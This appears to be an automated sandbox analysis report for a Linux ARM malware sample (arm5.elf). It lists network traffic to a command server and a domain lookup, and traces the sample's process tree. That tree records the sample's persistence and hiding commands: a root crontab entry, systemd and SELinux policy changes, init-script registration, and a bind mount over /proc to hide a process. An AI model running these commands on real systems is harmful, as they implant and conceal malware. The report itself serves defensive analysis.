Oct 28, 2024 19:24:55.088790894 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:57.169199944 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:57.169420004 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:59.240869999 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:59.241094112 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:01.290987968 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:01.291075945 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:03.372663975 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:03.372726917 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:05.430824995 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:05.431062937 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:08.524705887 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:08.524825096 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:08.525175095 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:08.525216103 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:08.525386095 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:08.525440931 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:08.525945902 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:08.525983095 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:09.524559021 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:09.524794102 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:13.666218042 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:13.666521072 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:15.732208967 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:15.732398033 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:17.841116905 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:17.841305971 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:19.934216976 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:19.934453964 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:22.015779972 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:22.016082048 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:24.065824986 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:24.065987110 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:26.139420033 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:26.139759064 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:28.180565119 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:28.180973053 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:30.259526014 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:30.259826899 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:32.325381994 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:32.325499058 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:34.377310038 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:34.377451897 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:36.431099892 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:36.431289911 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:38.700057983 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:38.700203896 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:40.771706104 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:40.772166967 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:42.566898108 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:42.567047119 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:44.611757994 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:44.611913919 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:46.657418966 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:46.657537937 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:48.698568106 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:48.698812962 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:50.774399042 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:50.774619102 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:52.854552031 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:52.854859114 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:54.928951979 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:54.929126978 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:57.006182909 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:57.006306887 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:25:59.055016994 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:25:59.055265903 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:26:01.100625038 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:26:01.100945950 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:26:03.155723095 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:26:03.155781984 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:26:05.256859064 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:26:05.257059097 CET	33444	1127	192.168.2.13	93.123.109.118

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 19:24:08.101012945 CET	42822	53	192.168.2.13	1.1.1.1
Oct 28, 2024 19:24:08.102004051 CET	51968	53	192.168.2.13	1.1.1.1
Oct 28, 2024 19:24:08.108865976 CET	53	42822	1.1.1.1	192.168.2.13
Oct 28, 2024 19:24:08.109620094 CET	53	51968	1.1.1.1	192.168.2.13
Oct 28, 2024 19:24:08.180198908 CET	53956	53	192.168.2.13	1.1.1.1
Oct 28, 2024 19:24:08.182219028 CET	40016	53	192.168.2.13	1.1.1.1
Oct 28, 2024 19:24:08.218204021 CET	53	40016	1.1.1.1	192.168.2.13
Oct 28, 2024 19:24:08.230374098 CET	53	53956	1.1.1.1	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 19:24:08.101012945 CET	192.168.2.13	1.1.1.1	0x5ef5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:24:08.102004051 CET	192.168.2.13	1.1.1.1	0x99f9	Standard query (0)	www.google.com	28	IN (0x0001)	false
Oct 28, 2024 19:24:08.180198908 CET	192.168.2.13	1.1.1.1	0x4ae7	Standard query (0)	j.xuanxuan1997.com	28	IN (0x0001)	false
Oct 28, 2024 19:24:08.182219028 CET	192.168.2.13	1.1.1.1	0x550f	Standard query (0)	j.xuanxuan1997.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 19:24:08.108865976 CET	1.1.1.1	192.168.2.13	0x5ef5	No error (0)	www.google.com	142.250.186.164	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:24:08.109620094 CET	1.1.1.1	192.168.2.13	0x99f9	No error (0)	www.google.com		28	IN (0x0001)	false
Oct 28, 2024 19:24:08.218204021 CET	1.1.1.1	192.168.2.13	0x550f	No error (0)	j.xuanxuan1997.com	93.123.109.118	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: arm5.elf PID: 5434, Parent PID: 5357

General

Start time (UTC):	18:23:58
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	/tmp/arm5.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5439, Parent PID: 5434

General

Start time (UTC):	18:23:58
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5439, Parent PID: 5434

General

Start time (UTC):	18:23:58
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	/tmp/arm5.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5452, Parent PID: 5439

General

Start time (UTC):	18:23:59
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: bash PID: 5452, Parent PID: 5439

General

Start time (UTC):	18:23:59
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5457, Parent PID: 5452

General

Start time (UTC):	18:23:59
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5457, Parent PID: 5452

General

Start time (UTC):	18:23:59
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5461, Parent PID: 5452

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5461, Parent PID: 5452

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5465, Parent PID: 5452

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5465, Parent PID: 5452

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5466, Parent PID: 5452

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 5466, Parent PID: 5452

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: arm5.elf PID: 5467, Parent PID: 5439

General

Start time (UTC):	18:24:01
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: bash PID: 5467, Parent PID: 5439

General

Start time (UTC):	18:24:01
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5472, Parent PID: 5467

General

Start time (UTC):	18:24:01
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5473, Parent PID: 5467

General

Start time (UTC):	18:24:01
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5474, Parent PID: 5467

General

Start time (UTC):	18:24:01
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: arm5.elf PID: 5475, Parent PID: 5439

General

Start time (UTC):	18:24:02
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: bash PID: 5475, Parent PID: 5439

General

Start time (UTC):	18:24:02
Start date (UTC):	28/10/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: arm5.elf PID: 5483, Parent PID: 5439

General

Start time (UTC):	18:24:03
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: update-rc.d PID: 5483, Parent PID: 5439

General

Start time (UTC):	18:24:03
Start date (UTC):	28/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	update-rc.d dns-udp4 defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 5485, Parent PID: 5483

General

Start time (UTC):	18:24:03
Start date (UTC):	28/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 5485, Parent PID: 5483

General

Start time (UTC):	18:24:03
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: arm5.elf PID: 5495, Parent PID: 5439

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: mount PID: 5495, Parent PID: 5439

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/5439
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: arm5.elf PID: 5521, Parent PID: 5439

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: service PID: 5521, Parent PID: 5439

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5526, Parent PID: 5521

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5526, Parent PID: 5521

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5527, Parent PID: 5521

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5527, Parent PID: 5521

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5528, Parent PID: 5521

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5528, Parent PID: 5521

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5541, Parent PID: 5521

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5542, Parent PID: 5541

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5542, Parent PID: 5541

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5543, Parent PID: 5541

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5543, Parent PID: 5541

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5521, Parent PID: 5439

General

Start time (UTC):	18:24:06
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: arm5.elf PID: 5552, Parent PID: 5439

General

Start time (UTC):	18:24:06
Start date (UTC):	28/10/2024
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: systemctl PID: 5552, Parent PID: 5439

General

Start time (UTC):	18:24:06
Start date (UTC):	28/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5459, Parent PID: 5458

General

Start time (UTC):	18:23:59
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5459, Parent PID: 5458

General

Start time (UTC):	18:23:59
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5463, Parent PID: 5462

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5463, Parent PID: 5462

General

Start time (UTC):	18:24:00
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5487, Parent PID: 5486

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5487, Parent PID: 5486

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: udisksd PID: 5509, Parent PID: 802

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 5509, Parent PID: 802

General

Start time (UTC):	18:24:04
Start date (UTC):	28/10/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 5544, Parent PID: 1

General

Start time (UTC):	18:24:06
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5544, Parent PID: 1

General

Start time (UTC):	18:24:06
Start date (UTC):	28/10/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5601, Parent PID: 5544

General

Start time (UTC):	18:25:01
Start date (UTC):	28/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5608, Parent PID: 5601

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5608, Parent PID: 5601

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5609, Parent PID: 5608

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5609, Parent PID: 5608

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5610, Parent PID: 5609

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5610, Parent PID: 5609

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5615, Parent PID: 5610

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5615, Parent PID: 5610

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: systemd PID: 5627, Parent PID: 1

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5627, Parent PID: 1

General

Start time (UTC):	18:25:02
Start date (UTC):	28/10/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5657, Parent PID: 5627

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5658, Parent PID: 5657

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5658, Parent PID: 5657

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5659, Parent PID: 5658

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5659, Parent PID: 5658

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5660, Parent PID: 5659

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5660, Parent PID: 5659

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5665, Parent PID: 5660

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5665, Parent PID: 5660

General

Start time (UTC):	18:26:01
Start date (UTC):	28/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: systemd PID: 5678, Parent PID: 1

General

Start time (UTC):	18:26:02
Start date (UTC):	28/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5678, Parent PID: 1

General

Start time (UTC):	18:26:02
Start date (UTC):	28/10/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
